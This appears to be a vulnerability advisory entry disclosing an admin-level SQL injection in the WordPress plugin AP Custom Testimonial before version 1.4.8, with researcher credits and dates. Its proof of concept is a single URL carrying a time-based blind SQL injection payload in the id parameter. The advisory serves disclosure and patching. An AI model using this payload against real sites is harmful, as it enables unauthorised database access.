WordPress Plugin Vulnerabilities

AP Custom Testimonial < 1.4.8 - Admin+ SQL Injection

Description

The plugin does not validate and escape the id parameter before using it in a SQL statement when retrieving a testimonial to edit, leading to a SQL Injection

Proof of Concept

https://example.com/wp-admin/admin.php?page=apct_testimonial_edit&id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)

Affects Plugins

References

Classification

Type
SQLI
OWASP top 10
CWE

Miscellaneous

Original Researcher
Rafael Castilho
Submitter
Rafael Castilho
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2022-01-25 (about 2 years ago)
Added
2022-01-25 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)

Other